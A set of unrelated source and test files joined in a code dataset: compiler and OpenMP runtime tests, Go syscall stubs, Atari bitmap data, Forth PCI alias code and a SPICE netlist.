// CHECK: [[PRIVATES:%.+]] = getelementptr inbounds [[KMP_TASK_MAIN_TY]], [[KMP_TASK_MAIN_TY]]* [[RES_KMP_TASK:%.+]], i{{[0-9]+}} 0, i{{[0-9]+}} 1
// CHECK: [[PRIVATE_S_ARR_REF:%.+]] = getelementptr inbounds [[PRIVATES_MAIN_TY]], [[PRIVATES_MAIN_TY]]* [[PRIVATES]], i{{.+}} 0, i{{.+}} 0
// CHECK: [[PRIVATE_VAR_REF:%.+]] = getelementptr inbounds [[PRIVATES_MAIN_TY]], [[PRIVATES_MAIN_TY]]* [[PRIVATES]], i{{.+}} 0, i{{.+}} 1
// CHECK: call void [[S_DOUBLE_TY_DESTR]]([[S_DOUBLE_TY]]* [[PRIVATE_VAR_REF]])
// CHECK: getelementptr inbounds [2 x [[S_DOUBLE_TY]]], [2 x [[S_DOUBLE_TY]]]* [[PRIVATE_S_ARR_REF]], i{{.+}} 0, i{{.+}} 0
// CHECK: getelementptr inbounds [[S_DOUBLE_TY]], [[S_DOUBLE_TY]]* %{{.+}}, i{{.+}} 2
// CHECK: [[PRIVATE_S_ARR_ELEM_REF:%.+]] = getelementptr inbounds [[S_DOUBLE_TY]], [[S_DOUBLE_TY]]* %{{.+}}, i{{.+}} -1
// CHECK: call void [[S_DOUBLE_TY_DESTR]]([[S_DOUBLE_TY]]* [[PRIVATE_S_ARR_ELEM_REF]])
// CHECK: icmp eq
// CHECK: br i1
// CHECK: ret i32
// CHECK: define {{.*}} i{{[0-9]+}} [[TMAIN_INT]]()
// CHECK: [[TEST:%.+]] = alloca [[S_INT_TY]],
// CHECK: [[T_VAR_ADDR:%.+]] = alloca i32,
// CHECK: [[VEC_ADDR:%.+]] = alloca [2 x i32],
// CHECK: [[S_ARR_ADDR:%.+]] = alloca [2 x [[S_INT_TY]]],
// CHECK: [[VAR_ADDR:%.+]] = alloca [[S_INT_TY]],
// CHECK: [[GTID:%.+]] = call i32 @__kmpc_global_thread_num([[LOC:%.+]])
// CHECK: call {{.*}} [[S_INT_TY_DEF_CONSTR:@.+]]([[S_INT_TY]]* [[TEST]])
// Do not store original variables in capture struct.
// CHECK-NOT: getelementptr inbounds [[CAP_TMAIN_TY]],
// Allocate task.
// Returns struct kmp_task_t {
// [[KMP_TASK_T_TY]] task_data;
// [[KMP_TASK_TMAIN_TY]] privates;
// };
// CHECK: [[RES:%.+]] = call i8* @__kmpc_omp_task_alloc([[LOC]], i32 [[GTID]], i32 9, i64 256, i64 1, i32 (i32, i8*)* bitcast (i32 (i32, [[KMP_TASK_TMAIN_TY]]*)* [[TASK_ENTRY:@[^ ]+]] to i32 (i32, i8*)*))
// CHECK: [[RES_KMP_TASK:%.+]] = bitcast i8* [[RES]] to [[KMP_TASK_TMAIN_TY]]*
// CHECK: [[TASK:%.+]] = getelementptr inbounds [[KMP_TASK_TMAIN_TY]], [[KMP_TASK_TMAIN_TY]]* [[RES_KMP_TASK]], i{{[0-9]+}} 0, i{{[0-9]+}} 0
// Initialize kmp_task_t->privates with default values (no init for simple types, default constructors for classes).
// CHECK: [[PRIVATES:%.+]] = getelementptr inbounds [[KMP_TASK_TMAIN_TY]], [[KMP_TASK_TMAIN_TY]]* [[RES_KMP_TASK]], i{{[0-9]+}} 0, i{{[0-9]+}} 2
// Constructors for s_arr and var.
// s_arr;
// CHECK: [[PRIVATE_S_ARR_REF:%.+]] = getelementptr inbounds [[PRIVATES_TMAIN_TY]], [[PRIVATES_TMAIN_TY]]* [[PRIVATES]], i{{[0-9]+}} 0, i{{[0-9]+}} 2
// CHECK: getelementptr inbounds [2 x [[S_INT_TY]]], [2 x [[S_INT_TY]]]* [[PRIVATE_S_ARR_REF]], i{{.+}} 0, i{{.+}} 0
// CHECK: getelementptr inbounds [[S_INT_TY]], [[S_INT_TY]]* %{{.+}}, i{{.+}} 2
// CHECK: call void [[S_INT_TY_DEF_CONSTR]]([[S_INT_TY]]* [[S_ARR_CUR:%.+]])
// CHECK: getelementptr inbounds [[S_INT_TY]], [[S_INT_TY]]* [[S_ARR_CUR]], i{{.+}} 1
// CHECK: icmp eq
// CHECK: br i1
// var;
// CHECK: [[PRIVATE_VAR_REF:%.+]] = getelementptr inbounds [[PRIVATES_TMAIN_TY]], [[PRIVATES_TMAIN_TY]]* [[PRIVATES]], i{{.+}} 0, i{{.+}} 3
// CHECK: call void [[S_INT_TY_DEF_CONSTR]]([[S_INT_TY]]* [[PRIVATE_VAR_REF:%.+]])
// Provide pointer to destructor function, which will destroy private variables at the end of the task.
// CHECK: [[DESTRUCTORS_REF:%.+]] = getelementptr inbounds [[KMP_TASK_T_TY]], [[KMP_TASK_T_TY]]* [[TASK]], i{{.+}} 0, i{{.+}} 3
// CHECK: [[DESTRUCTORS_PTR:%.+]] = bitcast %union{{.+}}* [[DESTRUCTORS_REF]] to i32 (i32, i8*)**
// CHECK: store i32 (i32, i8*)* bitcast (i32 (i32, [[KMP_TASK_TMAIN_TY]]*)* [[DESTRUCTORS:@.+]] to i32 (i32, i8*)*), i32 (i32, i8*)** [[DESTRUCTORS_PTR]],
// Start task.
// CHECK: call void @__kmpc_taskloop([[LOC]], i32 [[GTID]], i8* [[RES]], i32 1, i64* %{{.+}}, i64* %{{.+}}, i64 %{{.+}}, i32 0, i32 0, i64 0, i8* bitcast (void ([[KMP_TASK_TMAIN_TY]]*, [[KMP_TASK_TMAIN_TY]]*, i32)* [[TMAIN_DUP:@.+]] to i8*))
// No destructors must be called for private copies of s_arr and var.
// CHECK-NOT: getelementptr inbounds [[PRIVATES_TMAIN_TY]], [[PRIVATES_TMAIN_TY]]* [[PRIVATES]], i{{.+}} 0, i{{.+}} 2
// CHECK-NOT: getelementptr inbounds [[PRIVATES_TMAIN_TY]], [[PRIVATES_TMAIN_TY]]* [[PRIVATES]], i{{.+}} 0, i{{.+}} 3
// CHECK: call void [[S_INT_TY_DESTR:@.+]]([[S_INT_TY]]*
// CHECK-NOT: getelementptr inbounds [[PRIVATES_TMAIN_TY]], [[PRIVATES_TMAIN_TY]]* [[PRIVATES]], i{{.+}} 0, i{{.+}} 2
// CHECK-NOT: getelementptr inbounds [[PRIVATES_TMAIN_TY]], [[PRIVATES_TMAIN_TY]]* [[PRIVATES]], i{{.+}} 0, i{{.+}} 3
// CHECK: ret
//
// CHECK: define internal void [[PRIVATES_MAP_FN:@.+]]([[PRIVATES_TMAIN_TY]]* noalias, i32** noalias, [2 x i32]** noalias, [2 x [[S_INT_TY]]]** noalias, [[S_INT_TY]]** noalias)
// CHECK: [[PRIVATES:%.+]] = load [[PRIVATES_TMAIN_TY]]*, [[PRIVATES_TMAIN_TY]]**
// CHECK: [[PRIV_T_VAR:%.+]] = getelementptr inbounds [[PRIVATES_TMAIN_TY]], [[PRIVATES_TMAIN_TY]]* [[PRIVATES]], i32 0, i32 0
// CHECK: [[ARG1:%.+]] = load i32**, i32*** %{{.+}},
// CHECK: store i32* [[PRIV_T_VAR]], i32** [[ARG1]],
// CHECK: [[PRIV_VEC:%.+]] = getelementptr inbounds [[PRIVATES_TMAIN_TY]], [[PRIVATES_TMAIN_TY]]* [[PRIVATES]], i32 0, i32 1
// CHECK: [[ARG2:%.+]] = load [2 x i32]**, [2 x i32]*** %{{.+}},
// CHECK: store [2 x i32]* [[PRIV_VEC]], [2 x i32]** [[ARG2]],
// CHECK: [[PRIV_S_VAR:%.+]] = getelementptr inbounds [[PRIVATES_TMAIN_TY]], [[PRIVATES_TMAIN_TY]]* [[PRIVATES]], i32 0, i32 2
// CHECK: [[ARG3:%.+]] = load [2 x [[S_INT_TY]]]**, [2 x [[S_INT_TY]]]*** %{{.+}},
// CHECK: store [2 x [[S_INT_TY]]]* [[PRIV_S_VAR]], [2 x [[S_INT_TY]]]** [[ARG3]],
// CHECK: [[PRIV_VAR:%.+]] = getelementptr inbounds [[PRIVATES_TMAIN_TY]], [[PRIVATES_TMAIN_TY]]* [[PRIVATES]], i32 0, i32 3
// CHECK: [[ARG4:%.+]] = load [[S_INT_TY]]**, [[S_INT_TY]]*** {{.+}},
// CHECK: store [[S_INT_TY]]* [[PRIV_VAR]], [[S_INT_TY]]** [[ARG4]],
// CHECK: ret void
// CHECK: define internal i32 [[TASK_ENTRY]](i32, [[KMP_TASK_TMAIN_TY]]* noalias)
// CHECK: alloca i32*,
// CHECK-DAG: [[PRIV_T_VAR_ADDR:%.+]] = alloca i32*,
// CHECK-DAG: [[PRIV_VEC_ADDR:%.+]] = alloca [2 x i32]*,
// CHECK-DAG: [[PRIV_S_ARR_ADDR:%.+]] = alloca [2 x [[S_INT_TY]]]*,
// CHECK-DAG: [[PRIV_VAR_ADDR:%.+]] = alloca [[S_INT_TY]]*,
// CHECK: store void (i8*, ...)* bitcast (void ([[PRIVATES_TMAIN_TY]]*, i32**, [2 x i32]**, [2 x [[S_INT_TY]]]**, [[S_INT_TY]]**)* [[PRIVATES_MAP_FN]] to void (i8*, ...)*), void (i8*, ...)** [[MAP_FN_ADDR:%.+]],
// CHECK: [[MAP_FN:%.+]] = load void (i8*, ...)*, void (i8*, ...)** [[MAP_FN_ADDR]],
// CHECK: call void (i8*, ...) [[MAP_FN]](i8* %{{.+}}, i32** [[PRIV_T_VAR_ADDR]], [2 x i32]** [[PRIV_VEC_ADDR]], [2 x [[S_INT_TY]]]** [[PRIV_S_ARR_ADDR]], [[S_INT_TY]]** [[PRIV_VAR_ADDR]])
// CHECK: [[PRIV_T_VAR:%.+]] = load i32*, i32** [[PRIV_T_VAR_ADDR]],
// CHECK: [[PRIV_VEC:%.+]] = load [2 x i32]*, [2 x i32]** [[PRIV_VEC_ADDR]],
// CHECK: [[PRIV_S_ARR:%.+]] = load [2 x [[S_INT_TY]]]*, [2 x [[S_INT_TY]]]** [[PRIV_S_ARR_ADDR]],
// CHECK: [[PRIV_VAR:%.+]] = load [[S_INT_TY]]*, [[S_INT_TY]]** [[PRIV_VAR_ADDR]],
// Privates actually are used.
// CHECK-DAG: [[PRIV_VAR]]
// CHECK-DAG: [[PRIV_T_VAR]]
// CHECK-DAG: [[PRIV_S_ARR]]
// CHECK-DAG: [[PRIV_VEC]]
// CHECK: ret
// CHECK: define internal void [[TMAIN_DUP]]([[KMP_TASK_TMAIN_TY]]*, [[KMP_TASK_TMAIN_TY]]*, i32)
// CHECK: getelementptr inbounds [[KMP_TASK_TMAIN_TY]], [[KMP_TASK_TMAIN_TY]]* %{{.+}}, i32 0, i32 2
// CHECK: getelementptr inbounds [[PRIVATES_TMAIN_TY]], [[PRIVATES_TMAIN_TY]]* %{{.+}}, i32 0, i32 2
// CHECK: getelementptr inbounds [2 x [[S_INT_TY]]], [2 x [[S_INT_TY]]]* %{{.+}}, i32 0, i32 0
// CHECK: getelementptr inbounds [[S_INT_TY]], [[S_INT_TY]]* %{{.+}}, i64 2
// CHECK: br label %
// CHECK: phi [[S_INT_TY]]*
// CHECK: call {{.*}} [[S_INT_TY_DEF_CONSTR]]([[S_INT_TY]]*
// CHECK: getelementptr inbounds [[S_INT_TY]], [[S_INT_TY]]* %{{.+}}, i64 1
// CHECK: icmp eq [[S_INT_TY]]* %
// CHECK: br i1 %
// CHECK: getelementptr inbounds [[PRIVATES_TMAIN_TY]], [[PRIVATES_TMAIN_TY]]* %{{.+}}, i32 0, i32 3
// CHECK: call {{.*}} [[S_INT_TY_DEF_CONSTR]]([[S_INT_TY]]*
// CHECK: ret void
// CHECK: define internal i32 [[DESTRUCTORS]](i32, [[KMP_TASK_TMAIN_TY]]* noalias)
// CHECK: [[PRIVATES:%.+]] = getelementptr inbounds [[KMP_TASK_TMAIN_TY]], [[KMP_TASK_TMAIN_TY]]* [[RES_KMP_TASK:%.+]], i{{[0-9]+}} 0, i{{[0-9]+}} 2
// CHECK: [[PRIVATE_S_ARR_REF:%.+]] = getelementptr inbounds [[PRIVATES_TMAIN_TY]], [[PRIVATES_TMAIN_TY]]* [[PRIVATES]], i{{.+}} 0, i{{.+}} 2
// CHECK: [[PRIVATE_VAR_REF:%.+]] = getelementptr inbounds [[PRIVATES_TMAIN_TY]], [[PRIVATES_TMAIN_TY]]* [[PRIVATES]], i{{.+}} 0, i{{.+}} 3
// CHECK: call void [[S_INT_TY_DESTR]]([[S_INT_TY]]* [[PRIVATE_VAR_REF]])
// CHECK: getelementptr inbounds [2 x [[S_INT_TY]]], [2 x [[S_INT_TY]]]* [[PRIVATE_S_ARR_REF]], i{{.+}} 0, i{{.+}} 0
// CHECK: getelementptr inbounds [[S_INT_TY]], [[S_INT_TY]]* %{{.+}}, i{{.+}} 2
// CHECK: [[PRIVATE_S_ARR_ELEM_REF:%.+]] = getelementptr inbounds [[S_INT_TY]], [[S_INT_TY]]* %{{.+}}, i{{.+}} -1
// CHECK: call void [[S_INT_TY_DESTR]]([[S_INT_TY]]* [[PRIVATE_S_ARR_ELEM_REF]])
// CHECK: icmp eq
// CHECK: br i1
// CHECK: ret i32
#endif
#else
// ARRAY-LABEL: array_func
struct St {
int a, b;
St() : a(0), b(0) {}
St &operator=(const St &) { return *this; };
~St() {}
};
void array_func(int n, float a[n], St s[2]) {
// ARRAY: call i8* @__kmpc_omp_task_alloc(
// ARRAY: call void @__kmpc_taskloop(
// ARRAY: store float** %{{.+}}, float*** %{{.+}},
// ARRAY: store %struct.St** %{{.+}}, %struct.St*** %{{.+}},
#pragma omp taskloop simd private(a, s)
for (int i = 0; i < 10; ++i)
;
}
#endif
| {
"language": "Assembly"
} |
// RUN: %libomp-compile -fopenmp-version=50 && env OMP_NUM_THREADS='3' \
// RUN: %libomp-run | %sort-threads | FileCheck %s
// REQUIRES: ompt
// Checked gcc 10.1 still does not support detach clause on task construct.
// UNSUPPORTED: gcc-4, gcc-5, gcc-6, gcc-7, gcc-8, gcc-9, gcc-10
// clang supports detach clause since version 11.
// UNSUPPORTED: clang-10, clang-9, clang-8, clang-7
// icc compiler does not support detach clause.
// UNSUPPORTED: icc
#include "callback.h"
#include <omp.h>
int main() {
#pragma omp parallel
#pragma omp master
{
omp_event_handle_t event;
omp_event_handle_t *f_event;
#pragma omp task detach(event) depend(out : f_event) shared(f_event) if (0)
{
printf("task 1\n");
f_event = &event;
}
#pragma omp task depend(in : f_event)
{ printf("task 2\n"); }
printf("calling omp_fulfill_event\n");
omp_fulfill_event(*f_event);
#pragma omp taskwait
}
return 0;
}
// Check if libomp supports the callbacks for this test.
// CHECK-NOT: {{^}}0: Could not register callback 'ompt_callback_task_create'
// CHECK-NOT: {{^}}0: Could not register callback 'ompt_callback_task_schedule'
// CHECK-NOT: {{^}}0: Could not register callback 'ompt_callback_parallel_begin'
// CHECK-NOT: {{^}}0: Could not register callback 'ompt_callback_parallel_end'
// CHECK-NOT: {{^}}0: Could not register callback 'ompt_callback_implicit_task'
// CHECK-NOT: {{^}}0: Could not register callback 'ompt_callback_mutex_acquire'
// CHECK-NOT: {{^}}0: Could not register callback 'ompt_callback_mutex_acquired'
// CHECK-NOT: {{^}}0: Could not register callback 'ompt_callback_mutex_released'
// CHECK: {{^}}0: NULL_POINTER=[[NULL:.*$]]
// CHECK: {{^}}[[MASTER_ID:[0-9]+]]: ompt_event_parallel_begin:
// CHECK-SAME: parent_task_id=[[PARENT_TASK_ID:[0-9]+]],
// CHECK-SAME: parent_task_frame.exit=[[NULL]],
// CHECK-SAME: parent_task_frame.reenter=0x{{[0-f]+}},
// CHECK-SAME: parallel_id=[[PARALLEL_ID:[0-9]+]],
// CHECK-SAME: requested_team_size=3,
// CHECK: {{^}}[[MASTER_ID]]: ompt_event_implicit_task_begin:
// CHECK-SAME: parallel_id=[[PARALLEL_ID]],
// CHECK-SAME: task_id=[[IMPLICIT_TASK_ID:[0-9]+]]
// The following is to match the taskwait task created in __kmpc_omp_wait_deps
// this should go away, once codegen for "detached if(0)" is fixed
// CHECK: {{^}}[[MASTER_ID]]: ompt_event_task_create:
// CHECK-SAME: parent_task_id=[[IMPLICIT_TASK_ID]],
// CHECK-SAME: has_dependences=yes
// CHECK: {{^}}[[MASTER_ID]]: ompt_event_task_create:
// CHECK-SAME: parent_task_id=[[IMPLICIT_TASK_ID]],
// CHECK-SAME: parent_task_frame.exit=0x{{[0-f]+}},
// CHECK-SAME: parent_task_frame.reenter=0x{{[0-f]+}},
// CHECK-SAME: new_task_id=[[TASK_ID:[0-9]+]],
// CHECK: {{^}}[[MASTER_ID:[0-9]+]]: ompt_event_task_schedule:
// CHECK-SAME: first_task_id=[[IMPLICIT_TASK_ID]],
// CHECK-SAME: second_task_id=[[TASK_ID]],
// CHECK-SAME: prior_task_status=ompt_task_switch=7
// CHECK: {{^}}[[MASTER_ID:[0-9]+]]: ompt_event_task_schedule:
// CHECK-SAME: first_task_id=[[TASK_ID]],
// CHECK-SAME: second_task_id=[[IMPLICIT_TASK_ID]],
// CHECK-SAME: prior_task_status=ompt_task_detach=4
// CHECK: {{^}}[[MASTER_ID:[0-9]+]]: ompt_event_task_schedule:
// CHECK-SAME: first_task_id=[[TASK_ID]],
// CHECK-SAME: second_task_id=18446744073709551615,
// CHECK-SAME: prior_task_status=ompt_task_late_fulfill=6
| {
"language": "Assembly"
} |
// Copyright 2009 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// +build !gccgo
#include "textflag.h"
//
// System call support for 386, OpenBSD
//
// Just jump to package syscall's implementation for all these functions.
// The runtime may know about them.
TEXT ·Syscall(SB),NOSPLIT,$0-28
JMP syscall·Syscall(SB)
TEXT ·Syscall6(SB),NOSPLIT,$0-40
JMP syscall·Syscall6(SB)
TEXT ·Syscall9(SB),NOSPLIT,$0-52
JMP syscall·Syscall9(SB)
TEXT ·RawSyscall(SB),NOSPLIT,$0-28
JMP syscall·RawSyscall(SB)
TEXT ·RawSyscall6(SB),NOSPLIT,$0-40
JMP syscall·RawSyscall6(SB)
| {
"language": "Assembly"
} |
;Made from driveimage.bmp using driveimageconv.cpp
dta %00000000,%00000000,%00000000,%00001010,%10101010,%10101010,%10101010,%10101010,%10101010,%00000000,%00000000,%00000000,%00000000
dta %00000010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101000,%00000000
dta %00001010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%00000000
dta %00001010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%00000000
dta %00001010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%00000000
dta %00001010,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01011010,%00000000
dta %00101010,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01011010,%10000000
dta %00101001,%01010101,%01010101,%01010101,%01010101,%01010101,%11111111,%11111111,%01010101,%01010101,%01010101,%01010110,%10000000
dta %00101001,%01010101,%01010101,%01010101,%01010101,%01010101,%11111111,%11111111,%01010101,%01010101,%01010101,%01010110,%10000000
dta %00101001,%01010101,%01010101,%01010101,%01010101,%01010101,%11111111,%11111111,%01010101,%01010101,%01010101,%01010110,%10000000
dta %00101001,%01010101,%01010101,%01010101,%01010101,%01010101,%11111111,%11111111,%01010101,%01010101,%01010101,%01010110,%10000000
dta %10101001,%01010101,%01010101,%01010101,%01010101,%01010101,%11111111,%11111111,%01010101,%01010101,%01010101,%01010110,%10100000
dta %10101001,%01010101,%01010101,%01010101,%01010101,%01010101,%11111111,%11111111,%01010101,%01010101,%01010101,%01010110,%10100000
dta %10101001,%01010101,%01010101,%01010101,%01010101,%01010101,%11111111,%11111111,%01010101,%01010101,%01010101,%01010110,%10100000
dta %10101001,%01010101,%01010101,%01010101,%01010101,%01010101,%11111111,%11111111,%01010101,%01010101,%01010101,%01010110,%10100000
dta %10100101,%01010101,%01010101,%01010101,%01010101,%01010101,%11111111,%11111111,%01010101,%01010101,%01010101,%01010101,%10100000
dta %10100101,%01010101,%01010101,%01010101,%01010101,%01010101,%11111111,%11111111,%01010101,%01010101,%01010101,%01010101,%10100000
dta %10100101,%01010101,%01010111,%11111111,%11111111,%11111111,%11111111,%11111111,%11111111,%11111111,%11111111,%11010101,%10100000
dta %10100101,%01010101,%01010111,%11111111,%11111111,%11111111,%11111111,%11111111,%11111111,%11111111,%11111111,%11010101,%10100000
dta %10100101,%01010101,%01010111,%11111111,%11111111,%11111111,%11111111,%11111111,%11111111,%11111111,%11111111,%11010101,%10100000
dta %10100101,%01010101,%01010101,%01010101,%01010101,%01010101,%11111111,%11111111,%01010101,%01010101,%01010101,%01010101,%10100000
dta %10100101,%01010101,%01010101,%01010101,%01010101,%01010101,%11111111,%11111111,%01010101,%01010101,%01010101,%01010101,%10100000
dta %10100101,%01010101,%01010101,%01010101,%01010101,%01010101,%11111111,%11111111,%01010101,%01010101,%01010101,%01010101,%10100000
dta %10101001,%01010101,%01010101,%01010101,%01010101,%01010101,%11111111,%11111111,%01010101,%01010101,%01010101,%01010110,%10100000
dta %10101001,%01010101,%01010101,%01010101,%01010101,%01010101,%11111111,%11111111,%01010101,%01010101,%01010101,%01010110,%10100000
dta %10101001,%01010101,%01010101,%01010101,%01010101,%01010101,%11111111,%11111111,%01010101,%01010101,%01010101,%01010110,%10100000
dta %10101001,%01010101,%01010101,%01010101,%01010101,%01010101,%11111111,%11111111,%01010101,%01010101,%01010101,%01010110,%10100000
dta %10101001,%01010101,%01010101,%01010101,%01010101,%01010101,%11111111,%11111111,%01010101,%01010101,%01010101,%01010110,%10100000
dta %10101001,%01010101,%01010101,%01010101,%01010101,%01010101,%11111111,%11111111,%01010101,%01010101,%01010101,%01010110,%10100000
dta %00101001,%01010101,%01010101,%01010101,%01010101,%01010101,%11111111,%11111111,%01010101,%01010101,%01010101,%01010110,%10000000
dta %00101001,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01010110,%10000000
dta %00101001,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01010110,%10000000
dta %00101001,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01010110,%10000000
dta %00101010,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01011010,%10000000
dta %00001010,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01011010,%00000000
dta %00001010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%00000000
dta %00001010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%00000000
dta %00001010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%00000000
dta %00000010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101000,%00000000
dta %00000000,%00000000,%00000000,%00001010,%10101010,%10101010,%10101010,%10101010,%10101010,%00000000,%00000000,%00000000,%00000000
| {
"language": "Assembly"
} |
// Copyright 2009 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// +build !gccgo
#include "textflag.h"
//
// System call support for AMD64, Darwin
//
// Just jump to package syscall's implementation for all these functions.
// The runtime may know about them.
TEXT ·Syscall(SB),NOSPLIT,$0-56
JMP syscall·Syscall(SB)
TEXT ·Syscall6(SB),NOSPLIT,$0-80
JMP syscall·Syscall6(SB)
TEXT ·Syscall9(SB),NOSPLIT,$0-104
JMP syscall·Syscall9(SB)
TEXT ·RawSyscall(SB),NOSPLIT,$0-56
JMP syscall·RawSyscall(SB)
TEXT ·RawSyscall6(SB),NOSPLIT,$0-80
JMP syscall·RawSyscall6(SB)
| {
"language": "Assembly"
} |
\ *****************************************************************************
\ * Copyright (c) 2004, 2008 IBM Corporation
\ * All rights reserved.
\ * This program and the accompanying materials
\ * are made available under the terms of the BSD License
\ * which accompanies this distribution, and is available at
\ * http://www.opensource.org/licenses/bsd-license.php
\ *
\ * Contributors:
\ * IBM Corporation - initial implementation
\ ****************************************************************************/
\ Starting alias number for net devices after the onboard devices.
2 VALUE pci-net-num
\ Starting alias number for disks after the onboard devices.
0 VALUE pci-disk-num
\ Starting alias number for cdroms after the onboard devices.
0 VALUE pci-cdrom-num
\ define a new alias for this device
: pci-set-alias ( str-addr str-len num -- )
$cathex strdup \ create alias name
get-node node>path \ get path string
set-alias \ and set the alias
;
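\ An illustrative use (my sketch, not from the original source): with
\ the current node set to an ethernet device,
\   s" net" 0 pci-set-alias
\ concatenates "net" and 0 into "net0" and points that alias at the
\ node's full path, which is exactly how pci-alias-net below uses it.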
\ define a new net alias
: unknown-enet ( -- pci-net-num )
pci-net-num dup 1+ TO pci-net-num
;
: pci-alias-net ( config-addr -- )
u3? IF
pci-device-vec c@ CASE
2 OF pci-device-vec-len 1 >= IF
pci-device-vec 1+ c@ CASE
1 OF dup pci-addr2fn 1 >= IF 1 ELSE 0 THEN ENDOF
dup OF unknown-enet ENDOF
ENDCASE
ELSE
unknown-enet
THEN
ENDOF
dup OF unknown-enet ENDOF
ENDCASE
ELSE
pci-device-vec c@ CASE
2 OF pci-device-vec-len 1 >= IF
pci-device-vec 1+ c@ CASE
4 OF dup pci-addr2fn 1 >= IF 1 ELSE 0 THEN ENDOF
dup OF unknown-enet ENDOF
ENDCASE
ELSE
unknown-enet
THEN
ENDOF
dup OF unknown-enet ENDOF
ENDCASE
THEN
swap drop \ forget the config address
s" net" rot pci-set-alias \ create the alias
;
\ define a new disk alias
: pci-alias-disk ( config-addr -- )
drop \ forget the config address
pci-disk-num dup 1+ TO pci-disk-num \ increase the pci-disk-num
s" disk" rot pci-set-alias \ create the alias
;
\ define a new cdrom alias
: pci-alias-cdrom ( config-addr -- )
drop \ forget the config address
pci-cdrom-num dup 1+ TO pci-cdrom-num \ increase the pci-cdrom-num
s" cdrom" rot pci-set-alias \ create the alias
;
\ define the alias for the calling device
: pci-alias ( config-addr -- )
dup pci-class@
10 rshift CASE
01 OF pci-alias-disk ENDOF
02 OF pci-alias-net ENDOF
dup OF drop ENDOF
ENDCASE
;
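\ (Class-code map assumed above, per the PCI spec: pci-class@ returns
\ the 24-bit class register, the "10 rshift" keeps the base-class byte,
\ and base class 01 is mass storage while 02 is network.)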
| {
"language": "Assembly"
} |
* Extracted by KLayout
* cell RINGO
* pin FB
* pin VDD
* pin OUT
* pin ENABLE
* pin VSS
.SUBCKT RINGO 11 12 13 14 15
* net 11 FB
* net 12 VDD
* net 13 OUT
* net 14 ENABLE
* net 15 VSS
* cell instance $1 r0 *1 1.8,0
X$1 12 1 15 12 11 14 15 ND2X1
* cell instance $2 r0 *1 4.2,0
X$2 12 2 15 12 1 15 INVX1
* cell instance $3 r0 *1 6,0
X$3 12 3 15 12 2 15 INVX1
* cell instance $4 r0 *1 7.8,0
X$4 12 4 15 12 3 15 INVX1
* cell instance $5 r0 *1 9.6,0
X$5 12 5 15 12 4 15 INVX1
* cell instance $6 r0 *1 11.4,0
X$6 12 6 15 12 5 15 INVX1
* cell instance $7 r0 *1 13.2,0
X$7 12 7 15 12 6 15 INVX1
* cell instance $8 r0 *1 15,0
X$8 12 8 15 12 7 15 INVX1
* cell instance $9 r0 *1 16.8,0
X$9 12 9 15 12 8 15 INVX1
* cell instance $10 r0 *1 18.6,0
X$10 12 10 15 12 9 15 INVX1
* cell instance $11 r0 *1 20.4,0
X$11 12 11 15 12 10 15 INVX1
* cell instance $12 r0 *1 22.2,0
X$12 12 13 15 12 11 15 INVX1
.ENDS RINGO
* cell INVX1
* pin VDD
* pin OUT
* pin VSS
* pin
* pin IN
* pin SUBSTRATE
.SUBCKT INVX1 1 2 3 4 5 6
* net 1 VDD
* net 2 OUT
* net 3 VSS
* net 5 IN
* net 6 SUBSTRATE
* device instance $1 r0 *1 0.85,5.8 PMOS
M$1 1 5 2 4 PMOS L=0.25U W=1.5U AS=0.6375P AD=0.6375P PS=3.85U PD=3.85U
* device instance $2 r0 *1 0.85,2.135 NMOS
M$2 3 5 2 6 NMOS L=0.25U W=0.95U AS=0.40375P AD=0.40375P PS=2.75U PD=2.75U
.ENDS INVX1
* cell ND2X1
* pin VDD
* pin OUT
* pin VSS
* pin
* pin B
* pin A
* pin SUBSTRATE
.SUBCKT ND2X1 1 2 3 4 5 6 7
* net 1 VDD
* net 2 OUT
* net 3 VSS
* net 5 B
* net 6 A
* net 7 SUBSTRATE
* device instance $1 r0 *1 0.85,5.8 PMOS
M$1 2 6 1 4 PMOS L=0.25U W=1.5U AS=0.6375P AD=0.3375P PS=3.85U PD=1.95U
* device instance $2 r0 *1 1.55,5.8 PMOS
M$2 1 5 2 4 PMOS L=0.25U W=1.5U AS=0.3375P AD=0.6375P PS=1.95U PD=3.85U
* device instance $3 r0 *1 0.85,2.135 NMOS
M$3 3 6 8 7 NMOS L=0.25U W=0.95U AS=0.40375P AD=0.21375P PS=2.75U PD=1.4U
* device instance $4 r0 *1 1.55,2.135 NMOS
M$4 8 5 2 7 NMOS L=0.25U W=0.95U AS=0.21375P AD=0.40375P PS=1.4U PD=2.75U
.ENDS ND2X1
| {
"language": "Assembly"
} |
; NOTE: Assertions have been autogenerated by utils/update_test_checks.py
; RUN: opt < %s -reassociate -dce -S | FileCheck %s
; PR12985
; Verify the nsw flags are preserved when converting shl to mul.
define i32 @shl_to_mul_nsw(i32 %i) {
;
; CHECK-LABEL: @shl_to_mul_nsw(
; CHECK-NEXT: entry:
